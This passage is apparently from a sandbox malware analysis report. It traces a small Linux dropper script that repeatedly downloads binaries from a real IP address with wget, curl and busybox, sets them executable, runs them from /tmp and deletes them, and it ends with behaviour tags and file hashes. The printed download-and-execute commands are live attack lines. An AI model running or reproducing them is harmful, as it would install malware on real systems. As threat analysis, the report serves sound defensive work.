  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 960)
  - /bin/chmod: chmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 961)
      - File and Directory Permissions Modification
  - /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK: ./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 962)
      - Executes dropped EXE
  - /bin/rm: rm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 963)
  - /usr/bin/wget: wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 964)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 965)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 966)
  - /bin/chmod: chmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 967)
      - File and Directory Permissions Modification
  - /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5: ./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 968)
      - Executes dropped EXE
  - /bin/rm: rm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 969)
  - /usr/bin/wget: wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 970)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 971)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 972)
  - /bin/chmod: chmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 973)
      - File and Directory Permissions Modification
  - /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay: ./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 974)
      - Executes dropped EXE
  - /bin/rm: rm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 975)
  - /usr/bin/wget: wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 976)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 977)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 978)
  - /bin/chmod: chmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 979)
      - File and Directory Permissions Modification
  - /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f: ./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 980)
      - Executes dropped EXE
  - /bin/rm: rm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 981)
  - /usr/bin/wget: wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 982)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 983)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 984)
  - /bin/chmod: chmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 985)
      - File and Directory Permissions Modification
  - /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg: ./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 986)
      - Executes dropped EXE
  - /bin/rm: rm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 987)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97